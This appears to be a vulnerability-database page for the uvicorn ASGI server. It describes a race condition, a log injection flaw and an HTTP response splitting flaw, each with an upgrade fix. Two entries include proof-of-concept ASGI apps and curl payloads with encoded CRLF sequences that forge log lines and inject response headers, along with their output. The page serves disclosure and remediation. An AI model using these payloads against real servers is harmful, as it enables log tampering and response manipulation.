Race Condition
uvicorn is a lightning-fast ASGI server.
Affected versions of this package are vulnerable to Race Condition in the uvicorn/protocols/http component that leads Quart to hang with uvicorn. This vulnerability may allow an attacker to disrupt the server's response handling process under certain conditions, leading to potential Denial of Service (DoS) or other adverse impacts.
How to fix Race Condition? Upgrade uvicorn to version 0.12.3 or higher.
| |
Log Injection
uvicorn is a lightning-fast ASGI server.
Affected versions of this package are vulnerable to Log Injection. The request logger provided by the package is vulnerable to ASNI escape sequence injection. Whenever any HTTP request is received, the default behaviour of uvicorn is to log its details to either the console or a log file. When attackers request crafted URLs with percent-encoded escape sequences, the logging component will log the URL after it's been processed with urllib.parse.unquote, therefore converting any percent-encoded characters into their single-character equivalent, which can have special meaning in terminal emulators.
By requesting URLs with crafted paths, attackers can:
- Pollute uvicorn's access logs, therefore jeopardising the integrity of such files.
- Use ANSI sequence codes to attempt to interact with the terminal emulator that's displaying the logs (either in real time or from a file).
PoC
async def app(scope, receive, send):
print(scope)
assert scope['type'] == 'http'
await send({
'type': 'http.response.start',
'status': 200,
'headers': [
[b'Content-Type', b'text/plain']
]
})
await send({
'type': 'http.response.body',
'body': b'Hello, world!',
})
`
curl -v 'http://localhost:9999/logfile-injection%20HTTP%2f1.1%22%20200%20OK%0d%0aINFO:%20%20%20%20%208.8.8.8:1337%20-%20%22POST%20/admin/fake-action'
$ cat log.txt
INFO: 127.0.0.1:49242 - "GET /logfile-injection HTTP/1.1" 200 OK
INFO: 8.8.8.8:1337 - "POST /admin/fake-action HTTP/1.1" 200 OK
The previous GET request added a fake entry to the log file, stating that the host at 8.8.8.8 made a POST request to /admin/fake-action.
How to fix Log Injection? Upgrade uvicorn to version 0.11.7 or higher.
| |
HTTP Response Splitting
uvicorn is a lightning-fast ASGI server.
Affected versions of this package are vulnerable to HTTP Response Splitting. Uvicorn's implementation of the HTTP protocol for the httptools parser is vulnerable to HTTP response splitting. CRLF sequences are not escaped in the value of HTTP headers. Attackers can exploit this to add arbitrary headers to HTTP responses, or even return an arbitrary response body, whenever crafted input is used to construct HTTP headers.
PoC
async def app(scope, receive, send):
assert scope['type'] == 'http'
await send({
'type': 'http.response.start',
'status': 200,
'headers': [
[b'Content-Type', b'text/plain'],
[b'Referer', scope['path'].encode()],
]
})
await send({
'type': 'http.response.body',
'body': b'Hello, world!',
})
uvicorn poc-3:app --port 9999 --http httptools
To exploit this vulnerability, make a GET request with a crafted URL path like so:
curl -v 'http://localhost:9999/foo%0d%0abar:%20baz'
Uvicorn will return an additional HTTP header "bar" with the value "baz":
* Trying 127.0.0.1...
* Connected to localhost (127.0.0.1) port 9999 (#0)
> GET /foo%0d%0abar:%20baz HTTP/1.1
> Host: localhost:9999
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< date: Sun, 26 Apr 2020 22:38:18 GMT
< server: uvicorn
< content-type: text/plain
< referer: /foo
< bar: baz
< transfer-encoding: chunked
<
How to fix HTTP Response Splitting? Upgrade uvicorn to version 0.11.7 or higher.
| |
